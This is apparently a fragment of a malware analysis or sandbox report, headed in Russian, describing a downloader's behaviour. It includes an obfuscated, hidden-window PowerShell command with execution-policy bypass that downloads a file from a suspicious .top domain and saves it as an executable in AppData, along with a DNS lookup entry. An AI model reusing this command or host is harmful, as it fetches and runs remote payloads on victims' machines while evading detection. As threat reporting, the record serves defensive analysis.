Техническая информация
- http://mondayhelthc.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POWe^r^Sh^El^l.eXe ^-eXeCuT^io^NPOL^iCy^ b^ypaSs^ -No^pr^ofi^lE -W^iND^OwS^T^Y^le^ ^h^Id^deN ^(^N^Ew-O^BjEc^t^ ^s^Y^StE^m.N^Et^.w^E^BC^lIENT).^DOwN^lO^a^D^fiLE^('http://mo...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /c "POWe^r^Sh^El^l.eXe ^-eXeCuT^io^NPOL^iCy^ b^ypaSs^ -No^pr^ofi^lE -W^iND^OwS^T^Y^le^ ^h^Id^deN ^(^N^Ew-O^BjEc^t^ ^s^Y^StE^m.N^Et^.w^E^BC^lIENT).^DOwN^lO^a^D^fiLE^('http://mo...' (со скрытым окном)